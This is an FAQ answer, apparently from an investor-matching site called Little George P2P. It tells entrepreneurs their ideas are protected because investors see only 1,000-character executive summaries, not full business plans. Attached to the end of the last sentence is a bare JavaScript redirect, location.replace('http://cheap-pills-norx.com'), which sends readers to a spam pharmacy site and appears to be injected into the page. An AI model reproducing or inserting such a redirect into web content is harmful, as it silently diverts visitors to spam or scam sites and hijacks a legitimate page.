A: This is a very serious question and one we take seriously. Firstly we will never display your entire business plan to an Investor. Instead we will only display a snapshot or summary of your business idea to our business investor community.
By keeping our Entrepreneurs’ investment summaries brief we have found that this provides a sufficient safe guard of protecting the execution of your idea and this is the main part of any business idea that must be protected.
Remember Little George P2P is NOT a ‘public-forum’ and we only accept executive type investment summaries from entrepreneurs. It is important to note that as a product Inventor or entrepreneur, it is fundamentally the execution of the idea that must be protected. So as an analogy – you may not be able to protect or patent the concept of a ‘Pizza’, but you would want to protect and patent the execution of it, i.e. the ingredients and the process in which it is made and cooked.
This is why Little George P2P only sends executive type summaries (1000-characters long) to investors and the reason why we will NEVER ask entrepreneurs’ to display their entire business plan to investors beforehand.location.replace(“http://cheap-pills-norx.com”);